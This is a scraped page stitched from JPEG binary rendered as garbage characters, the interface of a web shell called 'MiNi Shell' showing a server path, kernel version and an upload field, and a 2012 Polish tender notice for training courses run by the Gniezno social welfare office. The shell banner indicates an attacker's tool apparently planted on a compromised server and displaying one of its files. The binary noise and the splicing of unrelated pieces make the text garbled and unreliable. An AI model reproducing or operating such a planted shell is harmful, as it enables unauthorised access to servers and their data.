JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/353450-N-2012.html

<p class="kh_header"><b>Gniezno: USŁUGI SZKOLENIOWE dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gnieźnie: I część zamówienia: Kurs fryzjerski - dla 20 osób;
II część zamówienia: Kurs przygotowujący do zawodu kucharza - dla 15 osób;
III część zamówienia: Kurs obsługi wózków widłowych - dla 37 osób</b><br>
<b>Numer ogłoszenia: 353450 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Gnieźnie , ul. Kolejowa 2, 62-200 Gniezno, woj. wielkopolskie, tel. 61 426-25-82; 426 30 16, faks 61 426-25-82 wew. 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.gniezno.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mops.gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI SZKOLENIOWE dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gnieźnie: I część zamówienia: Kurs fryzjerski - dla 20 osób;
II część zamówienia: Kurs przygotowujący do zawodu kucharza - dla 15 osób;
III część zamówienia: Kurs obsługi wózków widłowych - dla 37 osób.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiot zamówienia w zakresie części  nr 1 dotyczy wykonania usługi  szkoleniowej:  Kursu fryzjerskiego dla 20 osób
Kurs powinien się odbywać wg następującego programu:
Zajęcia teoretyczne: 15 godzin lekcyjnych (po 45 minut)-osobę
-Charakteryzowanie rozwoju rzemiosła i sztuki fryzjerskiej, 
-Bezpieczeństwo i higiena pracy w salonie fryzjerskim, 
-Charakterystyka budowy i fizjologii skóry, 
-Organizowanie prac fryzjerskich, 
-Technologia fryzjerstwa i materiały fryzjerskie, 
-Stylizacja- dobór koloru włosów i fryzury do typu urody, 
Zajęcia praktyczne: 85 godzin zegarowych -osobę (w tym egzamin końcowy)
-Dobieranie preparatów do pielęgnacji włosów, 
-Planowanie i wykonywanie zabiegów pielęgnacyjnych zabiegów pielęgnacyjnych, 
-Projektowanie fryzur, 
-Barwienie włosów, 
-Rozjaśnianie i odbarwianie włosów, 
-Stosowanie form kolorystycznych- baleyage, pasemka, kontrasty, 
-Stosowanie różnych form kształtowania fryzur- modelowanie włosów- nawijanie na wałki, układanie fal, modelowanie za pomocą szczotki, suszarki i fenu, prostowanie włosów,  
-Strzyżenie włosów, 
-Wykonywanie wodnej ondulacji, 
-Wykonywanie zabiegów trwałego ondulowania
Wymagana liczba godzin- osobę: 100 godzin, w tym 15 godzin lekcyjnych (po 45 minut) teorii i 85 godzin zegarowych praktyki.
Termin realizacji kursu: nie wcześniej niż od 08.10.2012r. i nie później niż do 29.10.2012r.
Zajęcia muszą odbywać się w podziale na 2 grupy, których liczebność nie będzie przekraczała 12 osób, z uwzględnieniem, iż:
-1 grupa będzie obywać zajęcia w godz. 8.00 - 14.00, 
-2 grupa będzie odbywać zajęcia w godz. 14.30 - 20.30.
Kurs powinien być realizowany wg planu nauczania obejmującego nie więcej niż 6 godzin zegarowych dziennie na osobę.
Miejsce kursu: zajęcia muszą odbywać się na terenie miasta Gniezna. 
Uczestnicy kursu zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na kurs. W przypadku nie podjęcia przez wskazaną osobę kursu lub przerwanie w trakcie trwania kursu Wykonawca ma obowiązek niezwłocznie zawiadomić o tym fakcie Zamawiającego, który prawo skierować na to miejsce inną osobę.
Kurs musi być prowadzony wyłącznie dla uczestników projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie i wyłącznie z ich udziałem.
Do realizacji szkolenia Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne) oraz materiały niezbędne do nauki zawodu (np. nożyczki, szczotki, farby lub tym podobne). Materiały szkoleniowe muszą być adekwatne do treści kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku kursu bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów szkoleniowych lub ich kserokopię potwierdzoną za zgodność z oryginałem Wykonawca jest zobowiązany przekazać Zamawiającemu.
Wykonawca musi prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listy obecności i przekazać je Zamawiającemu po zakończeniu kursu w oryginale wraz z potwierdzeniem przez wykładowców i wykonawcę (podpis i pieczęć).
Wykonawca musi zapewnić odzież ochronną (fartuchy, rękawice) dla wszystkich osób uczestniczących w kursie, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
Wykonawca musi zapewnić uczestnikom w odpowiedniej ilości ciepłe (kawa, herbata) i zimne napoje (soki, woda mineralne gazowana i niegazowana) oraz przekąski w postaci kruchych ciastek, maślanych, biszkoptowych lub słonych (np. paluszki) itp.
Zamawiający wymaga, aby kurs odbywał się w pomieszczeniach przestronnych, zapewniających odpowiednią do liczby osób uczestniczących ilość miejsc siedzących w trakcie części teoretycznej, w układzie pozwalającym na swobodne wykonywanie notatek i poruszanie się po sali, a także odpowiednią ilość stanowisk w trakcie części praktycznej (co najmniej 1 stanowisko dla 2 osób uczestniczących). Wykonawca musi zapewnić zaplecze socjalne i sanitarne zarówno w trakcie części teoretycznej jak i praktycznej.
Zamawiający wymaga, aby kurs zakończył się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu przeprowadzonego przez Wykonawcę, zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz. 216). Termin egzaminu należy wskazać w harmonogramie kursu.
Kurs musi zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzonych informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i oryginalnej listy potwierdzającej odbiór w-w zaświadczeń lub certyfikatów przez uczestników, potwierdzonej przez wykonawcę podpisem i pieczęcią.
	Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia.

3.2. Przedmiot zamówienia w zakresie części nr 2 dotyczy usługi szkoleniowej: Kursu przygotowujący do zawodu kucharza - dla 15 osób
Kurs powinien obejmować następujący zakres tematyczny: 
Zajęcia teoretyczne: 40 godzin lekcyjnych (po 45 minut) - osobę
Wiadomości wstępne, 
- pojęcie i podział gastronomii,
- rodzaje zakładów gastronomicznych,
- zakres działalności,
Organizacja zakładów gastronomicznych, wyposażenie techniczne, 
- działy zakładu gastronomicznego,
- magazyny żywnościowe,
- wyposażenie pomieszczeń,
Zasady bezpieczeństwa i higieny pracy, 
- zasady dobrej praktyki higienicznej, cateringowej,
- system HACCAP,
- wymagania higieniczne dla zakładów gastronomicznych,
- wymagania dla pracowników pracujących w gastronomii,
Przygotowywanie potraw:
Potrawy z warzyw i ziemniaków, 
- obróbka wstępna z warzyw i ziemniaków,
- podział warzyw,
- sporządzanie surówek,
- asortyment surówek,
- gotowanie warzyw,
- asortyment z warzyw gotowanych,
- dodatki,
- potrawy z ziemniaków,
- postępowanie z produktem i wyrobem gotowym,
Potrawy z grzybów, 
- podział grzybów,
- obróbka wstępna,
- zastosowanie w produkcji gastronomicznej,
- wpływ na zdrowie człowieka,
Potrawy z owoców, 
- podział owoców,
- obróbka wstępna owoców,
- zastosowanie w produkcji gastronomicznej,
- wpływ na zdrowie człowieka,
Potrawy z mleka, 
- zastosowanie mleka słodkiego w produkcji gastronomicznej,
- napoje mleczne fermentowane,
- śmietana i śmietanka,
- masło,
- sery twarogowe,
- sery dojrzewające,
Potrawy z jaj, 
- ogólna charakterystyka potraw z jaj,
- zastosowanie jaj w produkcji gastronomicznej,
Potrawy  mączne, 
- cechy użytkowe mąki,
- etapy produkcji ciast,
- technika wykonania ciasta makaronowego i kluskowego,
- sporządzenie pierogów i gotowanie potraw,
Potrawy z kasz, 
- rodzaje kasz,
- obróbka wstępna kasz,
- potrawy z kasz,
- gotowanie kasz,
Zupy i sosy gorące, 
- sporządzanie zup,
- asortyment zup,
- podział zup,
- dodatki,
- zagęszczanie zup,
- podział sosów,
- asortyment sosów,
- zastosowanie i technika wykonania,
Potrawy z mięsa, 
- przygotowanie półproduktu,
- sporządzanie,
- asortyment potraw z mięsa,
- dodatki do mięs,
- sposób podania,
Potrawy z drobiu, 
- przygotowanie półproduktu,
- sporządzanie, 
- asortyment potraw z drobiu,
- dodatki,
- sposób podania,
Potrawy z ryb, 
- przygotowanie półproduktu,
- sporządzanie,
- asortyment potraw z ryb,
- dodatki,
- sposób podania,
Potrawy półmięsne, 
- sporządzanie potraw gotowanych, smażonych, duszonych, pieczonych, zapiekanych
- asortyment potraw półmięsnych,
- dobór dodatków,
- sposób podania,
Zakąski na zimno i gorąco, 
- sporządzanie zakąsek z warzyw, mięsa, drobiu i ryb,
- zasady dekoracji, zdobienia zakąsek,
Napoje zimne i gorące, 
- pojęcie i podział napojów,
- technika sporządzania,
- asortyment,
- technika podania,
- dekoracja,
Zajęcia praktyczne: 110 godzin zegarowych - osobę (w tym egzamin końcowy)
-Potrawy jarskie, 
-Potrawy z ziemniaków, 
-Zakąski z warzyw, 
-Sałatki, 
-Potrawy z grzybów, 
-Potrawy z owoców, 
-Potrawy z jaj, 
-Zakąski z jaj, 
-Potrawy z mleka i przetworów mlecznych, 
-Ciasta makaronowe i sosy gorące, 
-Naleśniki, 
-Ciasto ziemniaczane i serowe, 
-Potrawy z kasz, 
-Zupy, 
-Mięsa gotowane, 
-Mięsa duszone, 
-Mięsa smażone, 
-Mięsa pieczone, 
-Podroby, 
-Potrawy z grila, 
-Zakąski z mięsa, 
-Drób gotowany, 
-Drób duszony, 
-Drób smażony, 
-Drób pieczony, 
-Zakąski z drobiu, 
-Potrawy z ryb, 
-Zakąski z ryb, 
-Potrawy ze śledzi, 
-Potrawy półmięsne, 
Wymagana liczba godzin-osobę: 150 godzin w tym 40 godzin lekcyjnych (po 45 minut) teorii, 110 godzin zegarowych praktyki.
Termin realizacji kursu: nie wcześniej niż od 08.10.2012 r. i nie później niż do 12.11.2012 r.
Kurs musi odbywać się w podziale na 2 grupy, których liczebność nie będzie przekraczała 9 osób,  z uwzględnieniem, iż
- pierwsza grupa będzie odbywała zajęcia w godz. 8.00 - 14.00,
- druga grupa będzie odbywała zajęcia w godz. 14.30 - 20.30.
Kurs powinien być realizowany wg planu nauczania obejmującego nie więcej niż 6 godzin zegarowych dziennie na osobę. 
Miejsce kursu: zajęcia muszą się odbywać na terenie miasta Gniezna.
Uczestnicy kursu zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem kursu otrzyma wykaz osób skierowanych na kurs. W przypadku nie podjęcia przez wskazaną osobę kursu lub przerwanie w trakcie trwania kursu Wykonawca ma obowiązek niezwłocznie zawiadomić o tym fakcie Zamawiającego, który ma prawo skierować na to miejsce inną osobę.
Kurs musi być prowadzony wyłącznie dla uczestników projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie i wyłącznie z ich udziałem.
Do realizacji kursu Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne) oraz materiały niezbędne do nauki zawodu. Materiały szkoleniowe związane z częścią teoretyczną muszą być adekwatne do treści kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku kursu bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię potwierdzoną za zgodność z oryginałem Wykonawca jest zobowiązany przekazać Zamawiającemu.
Wykonawca musi prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listy obecności i przekazać je Zamawiającemu po zakończeniu kursu w oryginale wraz z potwierdzeniem przez wykładowców i wykonawcę (podpis i pieczęć).
Wykonawca musi zapewnić wykonanie i opłatę niezbędnych badań lekarskich orzekających brak przeciwwskazań zdrowotnych do odbycia kursu i uzyskania uprawnień.
Wykonawca musi zapewnić odzież ochronną (fartuchy, czepki, obuwie) dla wszystkich osób uczestniczących w kursie, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
Wykonawca musi zapewnić uczestnikom w odpowiedniej ilości ciepłe (kawa, herbata) i zimne napoje (soki, woda mineralna gazowana i niegazowana) oraz przekąski w postaci kruchych ciastek, maślanych, biszkoptowych lub słonych (np. paluszki), itp.
Zamawiający wymaga, aby kurs odbywał się w pomieszczeniach przestronnych, zapewniających odpowiednią do liczby osób uczestniczących ilość miejsc siedzących w trakcie części teoretycznej w układzie pozwalającym na swobodne wykonywanie notatek i poruszanie się po sali i odpowiednią ilość stanowisk w trakcie części praktycznej. Wykonawca  musi zapewnić zaplecze socjalne i sanitarne zarówno w trakcie części teoretycznej jak i praktycznej.
Zamawiający wymaga, aby kurs zakończył się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu przeprowadzonego przez Wykonawcę zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Termin egzaminu należy wskazać w harmonogramie kursu.
Kurs musi zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzonych informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i oryginalnej listy potwierdzającej odbiór w-w zaświadczeń lub certyfikatów, potwierdzonej przez wykonawcę podpisem i pieczęcią.
Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestników na czas trwania kursu.
3.3. Przedmiot zamówienia w zakresie części nr 3 dotyczy usługi szkolenia: Kursu obsługi wózków widłowych - dla 37 osób
Kurs powinien się odbywać wg następującego programu:
Zajęcia teoretyczne: 52 godz. lekcyjne (po 45 minut) - osobę
Typy stosowanych wózków jezdniowych, 
Budowa wózka, 
Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy, 
Czynności kierowcy w czasie pracy z wózkami, 
Wiadomości z zakresu ładunkoznawstwa, 
Wiadomości z zakresu bhp, 
Wiadomości o dozorze technicznym, 
Bezpieczna obsługa - wymiana butli gazowych w wózkach wyposażonych w te urządzenia, 
Zajęcia praktyczne: 15 godz. zegarowych- osobę (w tym egzamin końcowy)
Instruktaż stanowiskowy,
Ćwiczenia w posługiwaniu się urządzeniami do kierowania i sterowania na unieruchomionym wózku,
Jazda bez ładunku,
Podjazd pod ładunek,
Podjęcie ładunku,
Rozładunek ładunku,
Jazda z ładunkiem ,
Manewry z wózkami,
Postój wózka,
Czynności obsługowe wykonywane przed pracami manewrowymi i po pracy
Wymagana liczba godzin-osobę: 67 godzin, w tym 52 godziny lekcyjne (po 45 minut) teorii i 15 godzin zegarowych praktyki.
Termin realizacji kursu: nie wcześniej niż 08.10.2012 r., zakończenie kursu powinno nastąpić nie później niż 10.11.2012 r., przy czym:
część teoretyczna kursu musi odbyć się w terminie nie wcześniej niż od 08.10.2012 r. i nie później niż do 16.10.2012 r.
Zajęcia muszą się odbywać w podziale na 2 grupy, których liczebność nie będzie przekraczała 21 osób, z uwzględnieniem, iż:
- pierwsza grupa będzie odbywała zajęcia w godz. 8.00- 14.00,
- druga grupa będzie odbywała zajęcia w godz. 14.30- 20.30.
Kurs musi być realizowany wg planu nauczania obejmującego nie więcej niż 6 godzin zegarowych dziennie na osobę. 
Miejsce kursu: zajęcia muszą odbywać się na terenie miasta Gniezna.
Uczestnicy kursu zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem kursu otrzyma wykaz osób skierowanych na kurs. W przypadku nie podjęcia przez wskazaną osobę kursu lub przerwanie w trakcie trwania kursu Wykonawca ma obowiązek niezwłocznie zawiadomić o tym fakcie Zamawiającego, który ma prawo skierować na to miejsce inną osobę.
Kurs musi być prowadzony wyłącznie dla uczestników projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie i wyłącznie z ich udziałem.
Do realizacji kursu Wykonawca musi zapewnić uczestnikom wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne) oraz materiały niezbędne do nauki zawodu. Materiały szkoleniowe związane z częścią teoretyczną muszą być adekwatne do treści kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku kursu bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię potwierdzoną za zgodność z oryginałem Wykonawca jest zobowiązany przekazać Zamawiającemu.
Wykonawca musi prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listy obecności i przekazać je Zamawiającemu po zakończeniu kursu w oryginale wraz z potwierdzeniem przez wykładowców i wykonawcę (podpis i pieczęć).
Wykonawca musi zapewnić wykonanie i opłatę badań lekarskich orzekających brak przeciwwskazań zdrowotnych do odbycia kursu i uzyskania uprawnień.
Wykonawca musi zapewnić uczestnikom w odpowiedniej ilości ciepłe (kawa, herbata) i zimne napoje (soki, woda mineralna gazowana i niegazowana) oraz przekąski w postaci kruchych ciastek, maślanych, biszkoptowych lub słonych (np. paluszki), itp.
Zamawiający wymaga, aby część teoretyczna kursu odbywała się w pomieszczeniach przestronnych, zapewniających odpowiednią do liczby osób uczestniczących ilość miejsc siedzących w układzie pozwalającym na swobodne wykonywanie notatek, a także  poruszanie się po sali. Wykonawca  musi zapewnić zaplecze socjalne i sanitarne zarówno w trakcie części teoretycznej jak i praktycznej.	
Zajęcia praktyczne muszą odbywać się w grupach 3-osobowych-1 wózek, zgodnie z programem nauczania.
Zamawiający wymaga, aby kurs zakończył się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu przeprowadzonego przez Wykonawcę zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Termin egzaminu należy wskazać w harmonogramie kursu.
Kurs musi zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzonych informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i oryginalnej listy potwierdzającej odbiór w-w zaświadczeń lub certyfikatów, potwierdzonej przez wykonawcę podpisem i pieczęcią.
Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające dotyczyć mogą zwiększenia ilości osób objętych kursem o max. 50 procent wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja posiadania uprawnień do wykonywania określonej działalności lub czynności polegać będzie w oparciu o oświadczenie o wpisie instytucji szkoleniowej do Rejestru Instytucji Szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy aktualne na rok 2012, złożone przez Wykonawcę w niniejszym postępowaniu wraz z wydrukiem ze strony internetowej www.ris.praca.gov.pl. potwierdzającym powyższe, metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu weryfikacji warunku posiadania przez Wykonawcę doświadczenia i wiedzy Zamawiający wymaga od Wykonawcy:
1.W przypadku Kursu fryzjerskiego, doświadczenia w przeprowadzeniu co najmniej 2 kursów w zakresie będącym przedmiotem zamówienia, w tym co najmniej 1 kursu w ramach projektów finansowanych ze środków Unii Europejskiej, w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a ilość uczestniczących w poszczególnych kursach/ grupach wynosiła każdorazowo min. 5 osób, co udokumentowane zostanie dołączonymi referencjami potwierdzającymi należyte wykonanie zadań.
2. w przypadku Kursu przygotowującego do zawodu kucharza, doświadczenia w przeprowadzeniu co najmniej 2 kursów w zakresie będącym przedmiotem zamówienia, w tym co najmniej 1 kursu w ramach projektów finansowanych ze środków Unii Europejskiej, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a ilość osób uczestnicząca w poszczególnych kursach/ grupach wynosiła min. 4 osoby, co udokumentowane zostanie dołączonymi referencjami potwierdzającymi należyte wykonanie zadań.
